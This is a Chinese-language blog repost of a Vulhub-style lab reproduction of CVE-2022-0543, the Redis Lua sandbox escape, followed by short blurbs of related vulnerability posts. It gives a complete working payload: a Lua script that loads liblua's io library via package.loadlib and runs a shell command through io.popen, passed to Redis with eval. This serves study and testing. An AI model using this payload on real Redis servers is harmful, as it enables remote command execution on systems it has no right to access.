2. 程式人生 > 其它 >Redis Lua沙盒繞過命令執行(CVE-2022-0543)

Redis Lua沙盒繞過命令執行(CVE-2022-0543)

阿新 發佈:2022-05-18

Redis是著名的開源Key-Value資料庫,其具備在沙箱中執行Lua指令碼的能力。

Debian以及Ubuntu發行版的源在打包Redis時,不慎在Lua沙箱中遺留了一個物件package,攻擊者可以利用這個物件提供的方法載入動態連結庫liblua裡的函式,進而逃逸沙箱執行任意命令。

參考連結:

漏洞環境

執行如下命令啟動一個使用Ubuntu源安裝的Redis 5.0.7伺服器:

docker-compose up -d

服務啟動後,我們可以使用redis-cli -h your-ip連線這個redis伺服器。

漏洞復現

我們藉助Lua沙箱中遺留的變數packageloadlib函式來載入動態連結庫/usr/lib/x86_64-linux-gnu/liblua5.1.so.0裡的匯出函式luaopen_io。在Lua中執行這個匯出函式,即可獲得io庫,再使用其執行命令:

local io_l = package.loadlib("/usr/lib/x86_64-linux-gnu/liblua5.1.so.0", "luaopen_io");
local io = io_l();
local f = io.popen("id", "r");
local res = f:read("*a");
f:close();
return res

值得注意的是,不同環境下的liblua庫路徑不同,你需要指定一個正確的路徑。在我們Vulhub環境(Ubuntu fiocal)中,這個路徑是/usr/lib/x86_64-linux-gnu/liblua5.1.so.0

連線redis,使用eval命令執行上述指令碼:

eval 'local io_l = package.loadlib("/usr/lib/x86_64-linux-gnu/liblua5.1.so.0", "luaopen_io"); local io = io_l(); local f = io.popen("id", "r"); local res = f:read("*a"); f:close(); return res' 0

可見命令已成功執行:

相關推薦

Redis Lua繞過命令執行CVE-2022-0543

Redis是著名的開源Key-Value資料庫,其具備在沙箱中執行Lua指令碼的能力。 Debian以及Ubuntu發行版的源在打包Redis時,不慎在Lua沙箱中遺留了一個物件package,攻擊者可以利用這個物件提供的方法載入動態連結庫lib

Spring Cloud Gateway Actuator API SpEL表示式注入命令執行CVE-2022-22947

Spring Cloud Gateway是Spring中的一個API閘道器。其3.1.0及3.0.6版本包含以前存在一處SpEL表示式注入漏洞,當攻擊者可以訪問Actuator API的情況下,將可以利用該漏洞執行任意命令

Spring Framework 遠端命令執行漏洞CVE-2022-22965

Spring Framework 遠端命令執行漏洞 CVE-2022-22965  近日,Spring 官方 GitHub issue中提到了關於 Spring Core 的遠端命令執行漏洞,該漏洞廣泛存在於Spring 框架以及衍生的框架中。

【Vulfocus靶場復現】joomla 遠端程式碼執行 CVE-2021-23132

漏洞介紹 Joomla是一套知名的內容管理系統,其使用PHP語言和 MySQL資料庫開發,可以在Linux、 Windows、MacOSX等各種不同的平臺上執行 Joomla官方釋出安全公告,修復了Joomla中的一個遠端程式碼執行漏洞(CVE-2021-

關於Spring Cloud Gateway 遠端程式碼執行漏洞CVE-2022-22947的安全告知

Spring Cloud Gateway 是 Spring Cloud 下的一個專案,該專案是基於 Spring 5.0、Spring Boot 2.0 和 Project Reactor 等技術開發的閘道器,它旨在為微服務架構提供一種簡單有效統一的 API 路由管理方式。

開源應用框架Spring Framework存在遠端程式碼執行漏洞CVE-2022-22965解決方案

監測發現,開源應用框架Spring Framework存在遠端程式碼執行漏洞(CVE-2022-22965。經分析研判,在JDKJava開發工具包9及以上版本環境中,或版本低於5.3.18和5.2.20的Spring框架及衍生框架構建的網站或應用中,

Spring Framework遠端程式碼執行漏洞CVE-2022-22965

一、漏洞描述 springframework 是spring 裡面的一個基礎開源框架,主要用於javaee的企業開發。

Dirty-Pipe Linux核心提權漏洞CVE-2022-0847

前言: 划水一波,哈哈,以後復現漏洞不再直接傻瓜無腦的走流程了,首先碼字寫加構思比較麻煩且寫的不多還效率不高,現在就是當做見到了一個漏洞,在此記錄一下這個漏洞,包括其來源,簡單的描述,適用範圍,以及其具

Redis設計與實現》讀書筆記二十九 ——Redis叢集執行命令與重新分片

Redis設計與實現》讀書筆記二十九 ——Redis叢集執行命令與重新分片 原創內容,轉載請註明來源,謝謝

ctfshow Web入門 40 - 命令執行10

題目過濾如下: 先檢視當前目錄下面有啥檔案 參考了羽大佬的WP:https://blog.csdn.net/miuzzx/article/details/108415301

ctfshow web入門 - 命令執行50

if(isset($_GET[\'c\'])){ $c=$_GET[\'c\']; if(!preg_match(\"/\\;|cat|flag| |[0-9]|\\\\$|\\*|more|less|head|sort|tail|sed|cut|awk|strings|od|curl|\\`|\\%|\\x09|\\x26/i\", $c)){

企業安全06-Apache Log4j Server 反序列化命令執行漏洞CVE-2017-5645

CVE-2017-5645 Apache Log4j Server 反序列化命令執行漏洞(CVE-2017-5645 一、漏洞原理 Apache Log4j是一個用於Java的日誌記錄庫,其支援啟動遠端日誌伺服器。Apache Log4j 2.8.2之前的2.x版本中存在安全漏洞。攻

Weblogic命令執行漏洞CVE-2018-2628復現

一、漏洞環境搭建 CVE-2018-2628影響的軟體版本為: Weblogic 10.3.6.0 Weblogic 12.1.3.0 Weblogic 12.2.1.2

Apache Solr 遠端命令執行漏洞復現CVE-2019-0193

一.漏洞介紹 Apache Solr 是一個開源的搜尋伺服器。Solr 使用 Java 語言開發,主要基於 HTTP 和 Apache Lucene 實現。此次漏洞出現在Apache Solr的DataImportHandler,該模組是一個可選但常用的模組,用於從資料庫

Webmin 命令執行漏洞 CVE-2020-35606--- 復現

漏洞繞過針對 採取的措施 CVE-2019-12840 並將其轉換為新向量。 供應商尚未修復此漏洞。

Webmin 命令執行漏洞 CVE-2020-35606---復現

CVE-Mitre 連結 下載 webmin_pu_escape_bypass_rce.rb (Metasploit) 漏洞簡介: 該模組利用 Webmin 1.962 及更低版本中的任意命令執行漏洞。 任何授權“包更新”模組的使用者都可以使用 root 許可權執行任意命令

熔斷器 Hystrix 原始碼解析 —— 命令執行執行隔離策略

本文主要基於 Hystrix 1.5.X 版本 1. 概述 2. HystrixThreadPoolProperties 3. HystrixThreadPoolKey

熔斷器 Hystrix 原始碼解析 —— 命令執行之正常執行邏輯

本文主要基於 Hystrix 1.5.X 版本 1. 概述 2. #applyHystrixSemantics(...) 3. TryableSemaphore 4. #executeCommandAndObserve(...)

Nexus Repository Manager 3 遠端命令執行漏洞CVE-2019-7238

Nexus Repository Manager 3 是一款軟體倉庫,可以用來儲存和分發Maven、NuGET等軟體源倉庫。其3.14.0及之前版本中,存在一處基於OrientDB自定義函式的任意JEXL表示式執行功能,而這處功能存在未授權訪問漏洞,將可以

Nexus Repository Manager 3 遠端命令執行漏洞CVE-2020-10199

Nexus Repository Manager 3 是一款軟體倉庫,可以用來儲存和分發Maven、NuGET等軟體源倉庫。其3.21.1及之前版本中,存在一處任意EL表示式注入漏洞。